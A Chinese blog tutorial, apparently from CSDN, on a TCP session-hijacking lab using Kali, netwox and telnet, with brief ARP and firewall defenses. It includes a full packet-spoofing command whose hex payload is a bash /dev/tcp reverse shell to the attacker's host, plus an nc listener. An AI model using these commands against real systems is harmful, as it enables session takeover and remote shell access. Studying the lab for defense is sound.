TCP劫持攻击与防御

最新推荐文章于 2024-07-16 10:30:27 发布
最新推荐文章于 2024-07-16 10:30:27 发布
阅读量2.7k 收藏 7
点赞数 1
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43518594/article/details/109187729
版权

TCP劫持攻击

攻击思路
在这里插入图片描述

  • hacker需要获取client与server的tcp回话信息(arp攻击等获取流量)。

  • 观察server给client的报文信息。

  • hacker根据观察获得的信息构造一个tcp报文,该报文是client给server的下一个报文。
    具体报文构造如下:

    • mac地址换成hacker 。
    • 三层的ip地址不变还是client的ip,目标也不变还是server的ip。
    • tcp信息根据观察构造,保证他是client给server的下一个报文tcp报文。

实验拓扑
在这里插入图片描述

说明:上述拓扑仅仅是为了读者更好的理解实验结构,真实场景中不需要构造,因为三者都使用的linux虚拟机进行操作。

攻击步骤
一、在kali端开启wireshark进行抓包
等待抓取TCP的流量。
注意,在第二步进行后,才会看到流量的通过。
抓取结果如下:
在这里插入图片描述

二、client使用telnet登录server
client登录到server端,查看当前路径下的文件。

三、根据步骤一二过程中抓取到的TCP流量,构造TCP数据包
进入kali,使用netwox 40号工具伪造TCP数据报文

Title: Spoof Ip4Tcp packet
Usage: netwox 40 [-c uint32] [-e uint32] [-f|+f] [-g|+g] [-h|+h] [-i uint32] [-j uint32] [-k uint32] [-l ip] [-m ip] [-n ip4opts] [-o port] [-p port] [-q uint32] [-r uint32] [-s|+s] [-t|+t] [-u|+u] [-v|+v] [-w|+w] [-x|+x] [-y|+y] [-z|+z] [-A|+A] [-B|+B] [-C|+C] [-D|+D] [-E uint32] [-F uint32] [-G tcpopts] [-H mixed_data]
Parameters:
 -c|--ip4-tos uint32            IP4 tos {0}
 -e|--ip4-id uint32             IP4 id (rand if unset) {0}
 -f|--ip4-reserved|+f|--no-ip4-reserved IP4 reserved
 -g|--ip4-dontfrag|+g|--no-ip4-dontfrag IP4 dontfrag
 -h|--ip4-morefrag|+h|--no-ip4-morefrag IP4 morefrag
 -i|--ip4-offsetfrag uint32     IP4 offsetfrag {0}
 -j|--ip4-ttl uint32            IP4 ttl {0}
 -k|--ip4-protocol uint32       IP4 protocol {0}
 -l|--ip4-src ip                IP4 src {192.168.162.128}
 -m|--ip4-dst ip                IP4 dst {5.6.7.8}
 -n|--ip4-opt ip4opts           IPv4 options
 -o|--tcp-src port              TCP src {1234}
 -p|--tcp-dst port              TCP dst {80}
 -q|--tcp-seqnum uint32         TCP seqnum (rand if unset) {0}
 -r|--tcp-acknum uint32         TCP acknum {0}
 -s|--tcp-reserved1|+s|--no-tcp-reserved1 TCP reserved1
 -t|--tcp-reserved2|+t|--no-tcp-reserved2 TCP reserved2
 -u|--tcp-reserved3|+u|--no-tcp-reserved3 TCP reserved3
 -v|--tcp-reserved4|+v|--no-tcp-reserved4 TCP reserved4
 -w|--tcp-cwr|+w|--no-tcp-cwr   TCP cwr
 -x|--tcp-ece|+x|--no-tcp-ece   TCP ece
 -y|--tcp-urg|+y|--no-tcp-urg   TCP urg
 -z|--tcp-ack|+z|--no-tcp-ack   TCP ack
 -A|--tcp-psh|+A|--no-tcp-psh   TCP psh
 -B|--tcp-rst|+B|--no-tcp-rst   TCP rst
 -C|--tcp-syn|+C|--no-tcp-syn   TCP syn                                                                                                                                                                           
 -D|--tcp-fin|+D|--no-tcp-fin   TCP fin                                                                                                                                                                           
 -E|--tcp-window uint32         TCP window {0}                                                                                                                                                                    
 -F|--tcp-urgptr uint32         TCP urgptr {0}                                                                                                                                                                    
 -G|--tcp-opt tcpopts           TCP options                                                                                                                                                                       
 -H|--tcp-data mixed_data       mixed data                                                                                                                                                                        
 --help2                        display help for advanced parameters                                                                                                                                              
Example: netwox 40

操作命令如下:sudo netwox 40 --ip4-ttl 128 --ip4-protocol 6 --ip4-src 192.168.162.132 --ip4-dst 192.168.162.131 --tcp-src 42319 --tcp-dst 23 --tcp-seqnum 353757777 --tcp-acknum 2242478244 --tcp-ack --tcp-psh --tcp-window 227 --tcp-data 62617368202D693E262F6465762F7463702F3139322E3136382E3136322E3132382F3939393920303E26310d00

其中,data部分为shell命令的16进制描述,意义是利用操作server端主动连接kali。

四、在kali端布置反弹shell
使用工具netcat
nc -l -p 9999 -v
-l为监听模式
-p为监听端口
-v是详细模式
在这里插入图片描述

五、发送伪造的TCP报文
在这里插入图片描述
查看是否与server建立了连接

在这里插入图片描述
可以看到,此时已经建立了连接

防御技术

  • 不要把网络安全信任关系建立在IP基础上或者MAC基础上,(RARP同样存在欺骗的问题),理想的关系应该建立在IP+MAC基础上。
  • 设置静态的MAC—>IP对应关系表,不要让主机刷新设定好的转换表。
  • 停止使用ARP,将需要的ARP作为永久条目保存在对应表中。
  • 建立防火墙来连续监控网络。
楓~
关注
基于TCP会话劫持-基于JS蠕虫的会话劫持-基于令牌和会话 ID 重置方法防止会话劫持
Martin-share的博客
02-03 830
基于TCP会话劫持-基于JS蠕虫的会话劫持-基于令牌和会话 ID 重置方法防止会话劫持
网络攻击防御期末考试知识点
热门推荐
qq_34175893的博客
03-16 1万+
Ch1-21.网络空间的理解:Cyberspace ,“第五空间”2.网络安全的属性?   除了保密性、完整性和可用性外,还增加:真实性、不可否认性3.    网络安全构成威胁的因素:l  环境因素,l  人为因素和l  系统自身因素(硬件软件协议的缺陷与漏洞),其中人为因素包括:恶意的(恶意攻击、违纪、违法和犯罪)和无意的(如工作疏忽造成失误、配置不当等)4.    软件漏洞产生的原因?(1) ...
Some useful techniques in hijacking
net0r的专栏
07-27 1462
1.HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters/,将IPEnableRouter的值改为16进制的1,这样就开启了ip路由功能。 xhijack 192.168.0.1 192.168.0.3,选择2号适配器,输入l命令来查看连接。如图八。图上清清楚楚的写着:(1)192.168.0.1:23192.1
Web 安全之点击劫持(Clickjacking)攻击详解_点击劫持攻击
最新发布
2401_85773496的博客
07-16 1175
点击劫持(Clickjacking)攻击,又称为界面伪装攻击,是一种利用视觉欺骗手段进行攻击的方式。攻击者通过技术手段欺骗用户点击本没有打算点击的位置,当用户在被攻击攻击的页面上进行操作时,实际点击结果被劫持,从而被攻击者利用。这种攻击方式利用了用户对网站的信任,通过覆盖层(通常是透明的iframe)覆盖在另一个网页之上,使受害者无法察觉。
TCP三次握手及会话劫持原理与实例
lidowx的专栏
11-18 1983
<br />首先详细了解一下TCP三次握手的过程<br /> <br />三次握手Three-way Handshake <br /><br />一个虚拟连接的建立是通过三次握手来实现的 <br /><br />1. (B) --> [SYN] --> (A) <br /><br />假如服务器A和客户机B通讯. 当A要和B通信时,B首先向A发一个SYN (Synchronize) 标记的包,告诉A请求建立连接. <br /><br />注意: 一个 SYN包就是仅SYN标记设为1的TCP包(参见TCP包头
什么是会话劫持攻击,怎样防御会话劫持攻击
canduecho的专栏
06-03 878
4. 巧取豪夺:攻击者通过身体力行的方法,如在公共场所窥视使用者的登录凭证信息,例如密码或 PIN 码等敏感信息,然后获取用户的 Cookie 或 Session ID 进行攻击。2. XSS 攻击攻击者通过注入恶意脚本或链接,篡改网页内容,并使用户在不知情的情况下访问并提供敏感信息,攻击者可以通过这些信息获取到用户的 Session ID。3. 中间人攻击攻击者通过 DNS 欺骗、ARP 欺骗等手段,欺骗用户访问假冒网站,并窃取用户的 Cookie 或 Session ID,然后进行会话劫持攻击
针对TCP协议的攻击与检测、预防方法
Gavin的专栏
05-15 5093
Land 攻击 通过发送源地址和目的地址相同,源端口和目的端口相同的ICMP echo 报文或TCP syn 请求报文,可以导致主机不断地向自己发送报文,最终导致系统崩溃。只要检查报文的源地址和目的地址是否相等、源端口和目的端口是否相等,就可以判断出是否为Land攻击。 Syn Flooding 利用TCP协议“三次握手”机制而发动的攻击。当Server(B)收到Client(A)的syn请
DNS欺骗劫持防御策略
10-18
使用DNS递归查询的安全模式,如使用TCP而非UDP进行查询,以减少中间人攻击的可能性。 3. **用户端保护**:使用可信的DNS解析服务,如公共DNS服务器(如Google Public DNS或OpenDNS);启用操作系统和浏览器的最新...
TCP劫持原理分析与实践
05-15
3. 使用防火墙:对于网络环境较为复杂的情况,可以使用防火墙来防御TCP劫持攻击。防火墙可以根据特定的规则对数据包进行过滤和检查,从而防止恶意数据包的传输。 4. 及时更新系统补丁和防病毒软件:保持系统和软件...
网络协议攻击-01-传输层协议攻击
xhxtalent的博客
11-28 4032
传输层协议攻击 前言 传输层的主要协议是TCP、UDP。 流行的攻击方式: TCP RST攻击 TCP会话劫持攻击 TCP SYN洪泛拒绝服务攻击 TCP RST 攻击 又称伪造TCP重置报文攻击,假冒干扰TCP通信连接的技术方法。 在TCP协议头的标志位中拥有一个“reset”比特位,绝大部分数据包中该标志位都置为0,而一旦该标志为置为1,则接收该数据包的主机将立即断开这个TCP会话连接,不再利用该连接进行数据包发送和接收。 危害: 当恶意攻击者滥用TCP重置报文,就会对正常的网络通信造成严重。 ​
计算机病毒与防护:IP欺骗的攻击防御.ppt
06-10
二是TCP会话劫持攻击者通过伪造被攻击方信任的IP地址,插入到已建立的合法TCP会话中,从而控制会话,获取敏感信息或执行非法操作。这种攻击依赖于攻击者对目标主机和其他可信主机之间关系的了解,一旦成功,后果...
TCP会话劫持原理与测试
hl1293348082的专栏
04-04 4028
阅读本文之前建议了解 TCP 三次握手过程以及 TCP 的包头详细信息。 由于 TCP 协议并没有对 TCP 的传输包进行验证,所以在我们知道一个 TCP 连接中的 seq 和 ack 的信息后就可以很容易的伪造传输包,假装任意一方与另一方进行通信,我们将这一过程称为 TCP 会话劫持TCP Session Hijacking) (可见,tcp 协议并无验证部分) 为解决这个问题,通常会在网络层采用 IPSec 协议,在传输层采用 TLS 协议,在应用层采用对应的协议。各协议安放位置如下。
TCP劫持
chenyijun的专栏
10-13 9474
http://www.pediy.com/kssd/pediy12/133433.html 此文自http://www.techrepublic.com/article/TCP-hijacking/5033594翻译而来,文章在翻译过程中根据译者个人理解有轻微改动。文章著作权归原作者所有,译者只保留中文著作权。本文只作为技术讨论之用,如因使用文中提到的技术而导致的任何良性和不良后果,本文
学习心得 TCP/IP攻击原理分析总结
ciqian8430的博客
09-22 387
由于TCP/IP协议是Internet的基础协议,所以对TCP/IP协议的完善和改进是非常必要的。TCP/IP协议从开始设计时候并没有考虑到现在网络上如此多的威胁,由此导致了许多形形色色的攻击方法,一般针对协议原理的攻击(尤其是...
TCP攻击原理及防护
Axiaozhi_的博客
08-03 348
存在大量连接状态,来自少数的几个源。这种攻击的原理是利用真实的IP地址向服务器发起大量的连接,并且建立连接之后很长时间不释放,占用服务器的资源,造成服务器服务器上残余连接(WAIT状态)过多,效率降低,甚至资源耗尽,无法响应其他客户所发起的连接。Connection Flood(TCP多连接攻击,CC攻击等通过建立大量连接请求导致拒绝服务的攻击类型的总称)是典型的并且非常的有效的利用小流量冲击大带宽网络服务的攻击方式,这种攻击方式目前已经越来越猖獗。2、对恶意连接的IP进行封禁。1、主动清除残余连接。
TCP劫持和流量分析
f_zhangwuji的博客
09-22 462
TCP劫持和流量分析 实验过程:客户机(192.168.16.129)telnet服务机(192.168.16.142),通过kali上的netwox(有的版本没有可以apt-get安装)进行tcp劫持。 1.客户机telnet服务机 数据流中可以看到命令。 2. 上图标记的645包为我构造数据包之前最后一条数举包,根据该包构造新数据包685 可以看到成功发送且客户机窗口多了我们刚刚构造数据包中的命令 3 客户机telnet窗口失去控制,随后断开。 正常流中包含命令的数据都会双向发送,构造的数据
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值